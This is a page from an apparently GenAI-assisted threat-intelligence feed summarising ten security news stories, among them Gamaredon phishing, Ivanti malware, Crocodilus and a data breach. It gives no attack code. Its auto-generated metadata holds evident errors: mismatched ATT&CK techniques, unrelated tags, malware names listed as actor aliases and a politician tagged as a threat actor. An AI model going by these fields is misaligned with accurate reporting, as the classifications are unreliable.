For suggestions, questions, bug reports, etc. please email or ping me on LinkedIn

infosec notes

I needed a better way to stay current with cybersecurity news and filter out the noise, so I created a tiny threat intel feed. The pipeline parses relevant content and leverages GenAI to help create the dataset that feeds this website. Rows with weak intelligence (those with no threat actor, aliases, exploit, vulnerabilities, or tpp fields present) are periodically removed so the feed is data-rich. As of 2/16/25, the dataset includes CVE severity information from CVEDetails with direct links to the relevant CVEs for more information.

Russia-Linked Gamaredon Uses Troop-Related Lures to Deploy Remcos RAT in Ukraine

Published: 2025-03-31

A new phishing campaign targeting Ukrainian entities has been linked to the Russia-based Gamaredon hacking group (also known as Aqua Blizzard, etc.). Cisco Talos researcher Guilherme Venere reported that Gamaredon is using "Russian words related to the movement of troops in Ukraine as a lure" in malicious LNK files disguised as Microsoft Office documents. These files, delivered via email, contain PowerShell code downloading a second-stage ZIP archive. This archive utilizes DLL side-loading to deploy the Remcos RAT. The attack leverages "geo-fenced servers located in Russia and Germany." Gamaredon, assessed to be affiliated with Russia's FSB, is known for espionage and data theft against Ukrainian organizations since at least 2013. The impact of this campaign is the potential compromise of Ukrainian organizations, leading to data theft and further espionage activities. Separately, Silent Push detailed a similar campaign targeting Russians sympathetic to Ukraine, using lures impersonating the CIA and Ukrainian surrender hotlines, hosted on Nybula LLC, to gather personal information. "All the campaigns [...] observed have had similar traits and shared a common objective: collecting personal information from site-visiting victims," Silent Push noted. This suggests potential disinformation and intelligence-gathering operations.

Tags: Remcos RATPhishingPowerShellDLL side-loadingGamaredonRussian Hacking

Categories: Threat IntelligenceMalware AnalysisCyber Espionage

Threat Actor: Gamaredon

Actor Aliases: Aqua BlizzardArmageddonBlue OtsoBlueAlphaHive0051Iron TildenPrimitive BearShuckwormTrident UrsaUAC-0010UNC530Winterflounder

Exploit Method: PowerShell Downloader and DLL Side-LoadingPhishing with Malicious LNK Files

MITRE ATT&CK TTP: Initial Access (TA0001) Phishing (T1566) Spearphishing Attachment (T1193) Execution (TA0002) PowerShell (T1059.001) Defense Evasion (TA0005) Deobfuscate/Decode Files or Information (T1140) Impact (TA0040) Data Encrypted for Impact (T1486)

Exploited Software: WindowsPowerShell

Involved Countries: UkraineRussiaGermany

Affected Industries: Government/Military

170,000 Impacted by Data Breach at Chord Specialty Dental Partners

Published: 2025-03-31

Chord Specialty Dental Partners (CDHA Management and Spark DSO), a US dental service organization supporting over 60 practices, suffered a data breach impacting over 170,000 individuals. The breach stemmed from unauthorized access to employee email accounts between August 18 and September 25, 2024, as revealed in a security incident notification. The compromised accounts contained sensitive data including names, addresses, dates of birth, SSNs, driver’s license numbers, bank account and payment card information, medical information, and health insurance details. While Chord "is not aware of any evidence to suggest that any information has been or will be fraudulently misused," they couldn't rule out the possibility of access. The attack method involved gaining unauthorized access to employee email accounts, likely through phishing or credential stuffing. Affected individuals are being offered credit monitoring and identity protection services. This incident follows a similar, large-scale email-based breach at Numotion, impacting nearly 500,000 individuals, highlighting the ongoing threat to healthcare data security.

Tags: Data BreachEmail CompromiseHealthcare Data Breach

Categories: Data Security Incident ResponseHealthcare Cybersecurity

Exploit Method: Email Account Compromise

MITRE ATT&CK TTP: Initial Access (TA0001) Valid Accounts (T1078) Initial Access (TA0001) Phishing (T1566)

Exploited Software: Email Software (Unspecified)

Involved Countries: United States

Affected Industries: Healthcare

China cracks down on personal information collection • The Register

Published: 2025-03-31

China launched a significant crackdown on the inappropriate collection and use of personal information, targeting six areas: apps and mini-apps in social media; software development kits lacking built-in privacy features; wearables and smart home products failing to disclose data collection practices; illegal use of facial recognition; offline data collection in restaurants and stores; and illegal collection by recruiters, transport, education, medical, and accommodation providers. The Cyberspace Administration of China, Ministry of Industry and Information Technology, Ministry of Public Security, and the State Administration for Market Regulation are jointly enforcing these measures. The article notes that, "China worries operators don’t spell out rules for personal information collection…and don’t allow opting out or complaints." While no specific victims are named, the impact is widespread, affecting numerous Chinese citizens and businesses. The crackdown focuses on private entities, omitting government surveillance practices. This action highlights China’s renewed commitment to privacy regulations, although the enforcement’s effectiveness remains to be seen.

Tags: China Privacy CrackdownIndonesia Social Media RegulationAI-Generated Content WatermarkingJapan Airlines In-Flight AI

Categories: Government Regulation of TechnologyData Privacy and SecurityAI and Emerging Technologies

Exploit Method: Inappropriate Personal Information Collection in Apps and Services

MITRE ATT&CK TTP: Collection (TA0009) Input Capture (T1056) Initial Access (TA0001) Phishing (T1566)

Exploited Software: Unspecified social media apps and mini-appsUnspecified Software Development Kits (SDKs)Unspecified Wearables and Smart Home Products

Involved Countries: ChinaIndonesiaIndiaJapan

Affected Industries: Software DevelopmentWearables and Smart HomeFood ServiceRetailRecruitmentTransportationEducationHealthcareAccommodationSemiconductor Assembly and Test (OSAT)Airline

GenAI turning employees into unintentional insider threats

Published: 2025-03-31

Netskope's recent report reveals a dramatic increase in enterprise data shared with Generative AI (GenAI) apps – a 30x jump in one year, reaching 7.7GB per month on average. This includes sensitive data like source code, intellectual property, and passwords, significantly increasing breach risks. James Robinson, CISO at Netskope, notes that "shadow AI" is prevalent, with "nearly three-quarters of users still accessing GenAI apps through personal accounts." This lack of control is exemplified by DeepSeek, where 91% of enterprises had users accessing it within weeks of launch, despite lacking security policies. Ray Canzanese, Director of Netskope Threat Labs, emphasizes GenAI's ubiquity, stating, "It is becoming increasingly integrated...This ubiquity presents a growing cybersecurity challenge." The shift to on-premise GenAI infrastructure, now at 54% of organizations (up from under 1%), introduces new risks like supply chain vulnerabilities and prompt injection. The report highlights that while 99% of organizations are implementing policies to mitigate risks, the widespread adoption of GenAI by employees via personal accounts creates a substantial unintentional insider threat. Ari Giguere, VP of Security and Intelligence Operations at Netskope, states that "AI isn’t just reshaping perimeter and platform security—it’s rewriting the rules." The impact includes potential data breaches, intellectual property theft, compliance violations, and the exposure of sensitive information used to train third-party AI models.

Tags: Generative AIInsider ThreatsShadow ITData SecurityData Loss Prevention (DLP)

Categories: Enterprise SecurityCloud Security

Exploit Method: Data Leakage via Unsecured GenAI AppsPrompt InjectionShadow AI

MITRE ATT&CK TTP: Credential Access (TA0006) Unsecured Credentials (T1552) Initial Access (TA0001) Supply Chain Compromise (T1195)

Exploited Software: ChatGPTGoogle GeminiGrammarlyDeepSeek

Affected Industries: Software Development

CISA Analyzes Malware Used in Ivanti Zero-Day Attacks

Published: 2025-03-31

CISA recently published its analysis of Resurge, a SpawnChimera malware variant used in attacks exploiting a zero-day vulnerability in Ivanti Connect Secure (CVE-2025-0282). This vulnerability, a stack-based buffer overflow, allows remote code execution without authentication. Mandiant previously attributed attacks leveraging this vulnerability, patched in January 2025, to UNC5221, a China-linked espionage group. CISA's analysis reveals Resurge, dropped as ‘libdsupgrade.so’, possesses "capabilities of a rootkit, dropper, backdoor, bootkit, proxy, and tunneler." CISA notes that Resurge "contains a series of commands that modify files, manipulates integrity checks, and creates a web shell." Similar to SpawnChimera, it checks if loaded by ‘web’ or ‘dsmdm’ to create proxies or SSH tunnels. The malware also uses ‘liblogblock.so’ (a SpawnSloth variant) to modify logs and a 64-bit executable, ‘dsmain,’ containing BusyBox applets for payload execution. The impact includes remote code execution, data exfiltration, and system compromise, potentially leading to significant data breaches and espionage. The attack method involved exploiting a known vulnerability and deploying sophisticated malware with persistence mechanisms.

Tags: Malware AnalysisZero-Day ExploitSpawnChimera MalwareChina-linked Espionage

Categories: Vulnerability AnalysisMalware AnalysisThreat Intelligence

Threat Actor: UNC5221

Actor Aliases: SpawnChimeraResurgeSpawnAntSpawnMoleSpawnSnailSpawnSloth

Exploit Method: SpawnChimera Malware DeploymentResurge Malware Deployment

Vulnerabilities: CVE-2025-0282

MITRE ATT&CK TTP: Command and Control (TA0011) Proxy (T1090) Initial Access (TA0001) Exploit Public-Facing Application (T1190) Lateral Movement (TA0008) Remote Services (T1021) Defense Evasion (TA0005) Process Injection (T1055) Defense Evasion (TA0005) Modify Registry (T1112)

Exploited Software: Ivanti Connect Secure

Involved Countries: ChinaUSAJapan

Affected Industries: VPN

CRITICAL Vulnerabilities (1)

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS: 91.52%    Percentile: 100%

An AI Image Generator’s Exposed Database Reveals What People Really Used It For | WIRED

Published: 2025-03-31

A security researcher, Jeremiah Fowler, discovered an unsecured database belonging to South Korea-based GenNomis, containing over 95,000 records of explicit AI-generated images, including AI-generated child sexual abuse material (CSAM). The database, over 45 GB in size, also included prompts used to generate the images, featuring celebrities like Ariana Grande and the Kardashians depicted as children. Fowler noted "how easy it is to create that content," highlighting the ease with which such material can be produced. The database exposed "AI-generated pornographic images of adults" and what appeared to be real photographs used to create "explicit nude or sexual AI-generated images." GenNomis' website, which offered various AI tools including an image generator, face-swapping tool, and a "NSFW" gallery, was subsequently shut down after WIRED contacted the company. Clare McGlynn, a law professor, commented on the "disturbing extent to which there is a market for AI that enables such abusive images to be generated." The incident underscores the rapid growth of AI-generated CSAM, with Derek Ray-Hill of the Internet Watch Foundation stating that "webpages containing AI-generated child sexual abuse material have more than quadrupled since 2023." The ease of generating such content, coupled with the apparent lack of moderation on GenNomis' platform, raises significant concerns about the potential for widespread abuse and the urgent need for stronger safeguards. Fowler emphasized that "the technology has raced ahead of any of the guidelines or controls."

Threat Actor: GenNomisAI-Nomis

Exploit Method: Unsecured Database ExposureAI-Generated CSAM Creation and Distribution

MITRE ATT&CK TTP: Credential Access (TA0006) Unsecured Credentials (T1552) Defense Evasion (TA0005) Obfuscate/Decode Files or Information (T1140)

Exploited Software: GenNomis AI image generation tools

Involved Countries: South KoreaUK

Affected Industries: AI Image Generation

How to recognize and prevent deepfake scams

Published: 2025-03-31

Deepfakes, AI-generated videos, images, and audio, are increasingly used in scams. According to a Help Net Security article, an Entrust report revealed a deepfake attack occurred every five minutes in 2024, resulting in significant financial losses. One multinational company lost over $25 million due to a deepfake video conference call coupled with social engineering. Crypto companies suffered an average loss of $440,000 per attack. A particularly egregious example involved a French woman scammed out of €830,000 over 18 months by a scammer posing as Brad Pitt using AI-generated images. The article notes that deepfakes utilize Generative Adversarial Networks (GANs) and autoencoders. Software like DeepFaceLab and mobile apps like Zao are making deepfake creation readily accessible. The impact extends beyond financial loss, causing emotional distress and undermining trust. The article advises users to look for inconsistencies like unnatural blinking, mismatched lighting, and poor audio-visual sync to spot deepfakes. Mitigating risks involves using deepfake detection tools, staying updated on trends, implementing multi-factor authentication (MFA), establishing verification processes, and limiting personal media sharing online. As the article concludes, "No one knows what the future holds...All we can do is exercise caution and take every measure within our power to safeguard ourselves."

Tags: DeepfakesGenerative Adversarial Networks (GANs)CybercrimeSocial EngineeringMisinformation

Categories: Deepfake Detection and PreventionDeepfake Technology and CreationDeepfake-Related Cyberattacks

Threat Actor: Scammers

Exploit Method: Deepfake Social Engineering and Financial Fraud

MITRE ATT&CK TTP: Initial Access (TA0001) Phishing (T1566) Initial Access (TA0001) Phishing (T1566)

Involved Countries: France

Affected Industries: CryptocurrencyMultinational Companies

'Crocodilus' Android Banking Trojan Allows Device Takeover, Data Theft

Published: 2025-03-31

ThreatFabric has identified a new Android banking trojan, Crocodilus, capable of advanced device takeover and data theft. Targeting users in Spain and Turkey, Crocodilus uses a dropper bypassing Android 13 restrictions and requesting Accessibility Services permissions for complete device control. As ThreatFabric explains, "Crocodilus will enumerate all the elements displayed on the screen in Google Authenticator app, capture the text displayed...and send these to the C&C, allowing timely theft of OTP codes for the operators." The malware employs keylogging, overlay attacks, and remote access capabilities, enabling threat actors to steal credentials and conduct fraudulent transactions. It also uses social engineering, displaying messages urging victims to back up their cryptocurrency wallet keys after stealing them. While linked to the threat actor ‘sybra’, previously associated with malware like MetaDroid, Hook, and Octo, Crocodilus's code suggests a different developer, possibly Turkish-speaking. The impact includes financial losses for victims and potential extensive data breaches. The malware's ability to bypass security measures and its sophisticated techniques highlight the evolving nature of mobile threats.

Tags: Android MalwareBanking TrojanData TheftRemote Access Trojan (RAT)Social Engineering

Categories: Mobile SecurityMalware Analysis

Threat Actor: sybraTurkish-speaking developer

Exploit Method: Accessibility Service ExploitationAndroid 13+ Bypass

MITRE ATT&CK TTP: Execution (TA0002) Command and Scripting Interpreter (T1059) Collection (TA0009) Input Capture (T1056) Credential Access (TA0006) OS Credential Dumping (T1003) Credential Access (TA0006) Credentials from Password Stores (T1555) Content Injection (T1659)

Exploited Software: AndroidGoogle Authenticator

Involved Countries: SpainTurkey

Affected Industries: BankingCryptocurrency

Morphing Meerkat phishing kits exploit DNS MX records

Published: 2025-03-31

A March 31, 2025, Security Affairs article details the malicious use of Morphing Meerkat phishing kits exploiting DNS MX records. While the article doesn't name specific victims of this particular attack, it highlights numerous other significant cyber incidents. These include ransomware attacks targeting Sam's Club (allegedly by Cl0p), the Virginia Attorney General’s Office (Cloak ransomware), Astral Foods (resulting in over $1 million in losses), and Ukraine's national railway operator, Ukrzaliznytsia. Other attacks involved various banking trojans (Crocodilus, Grandoreiro, Mamont), and the exploitation of vulnerabilities in software from VMware, Google Chrome, Sitecore, Next.js, and Apache Tomcat. The article also mentions the impact of supply chain attacks targeting GitHub Actions and the use of malicious Windows drivers (ABYSSWORKER) by Medusa ransomware to disable security tools. The Morphing Meerkat kits themselves leverage DNS MX records, a technique that likely allows attackers to send phishing emails appearing to originate from legitimate email servers, increasing their chances of success. The widespread nature of these attacks underscores the constant threat landscape and the need for robust cybersecurity measures. The article states that "Crooks are reviving the Grandoreiro banking trojan," showing the persistence of older threats alongside emerging ones.

Threat Actor: Morphing Meerkat

Exploit Method: Morphing Meerkat Phishing Kits exploiting DNS MX records

MITRE ATT&CK TTP: Initial Access (TA0001) Phishing (T1566) Spearphishing Link (T1192) Command and Control (TA0011) Proxy (T1090) Content Injection (T1659)

Exploited Software: WordPress

Involved Countries: United KingdomUnited States

Affected Industries: Internet Service Providers (ISPs)Technology

How Each Pillar of the 1st Amendment is Under Attack – Krebs on Security

Published: 2025-03-31

President Trump's second term has seen unprecedented attacks on the First Amendment, targeting all five pillars. The administration's actions, as detailed in Krebs on Security, include firing staff processing Freedom of Information Act (FOIA) requests ("President Trump recently fired most of the people involved in processing Freedom of Information Act (FOIA) requests for government agencies"), using Signal for discussions to avoid creating a lasting record ("Intentional or not, use of Signal in this context was an act of erasure"), and issuing executive orders against law firms representing those who sued him (Skadden, Arps, Slate, Meager & Flom, Paul, Weiss, Rifkind, Wharton & Garrison, Jenner & Block, and WilmerHale). Judges Richard Leon and James Boasberg blocked some of these orders, prompting Trump to call for their impeachment; Supreme Court Justice John Roberts rebuked this ("impeachment is not an appropriate response to disagreement concerning a judicial decision"). House Speaker Mike Johnson threatened to eliminate federal courts ("We can eliminate an entire district court"). The administration also discourages protests, threatening funding cuts to universities and targeting pro-Palestinian students; Secretary of State Marco Rubio revealed at least 300 foreign student visas were revoked. Trump sued multiple news outlets (60 Minutes, CNN, The Washington Post, The New York Times, The Des Moines Register, and ABC News) for negative coverage, with some settling (Disney settled with ABC News for $15 million, Meta with Trump for $25 million). The FCC, under Brendan Carr, reopened investigations into several networks. The administration also restricted speech within government, removing data sets from websites ("hundreds of terabytes of digital resources analyzing data have been taken off government websites"), and freezing funding for programs promoting "Marxist equity, transgenderism, and green new deal social engineering policies." Additionally, funding for the U.S. Agency for Global Media (USAGM) was cut, impacting outlets like Radio Free Europe/Radio Liberty and Voice of America, though Judge Royce Lamberth temporarily blocked this. Finally, a policy change allowed immigration enforcement in churches, impacting religious freedom, prompting criticism from Rev. Paul Brandeis Raushenbush and Americans United for Separation of Church and State. The article suggests Trump's actions are influenced by Hungarian Prime Minister Viktor Orbán's tactics.

Threat Actor: President Trump

Actor Aliases: POTUS

Exploit Method: Use of Signal for Concealing Government CommunicationsStrategic Lawsuits Against Public Participation (SLAPP)Weaponization of Federal Funding and Resources

MITRE ATT&CK TTP: Defense Evasion (TA0005) Impair Defenses (T1562) Defense Evasion (TA0005) Indicator Removal (T1070)

Exploited Software: Signal

Involved Countries: HungaryVenezuelaYemenIsrael

Affected Industries: MediaLegal ServicesHigher Education

Page 1 of 50
Showing articles 1 to 10 of 500 newest articles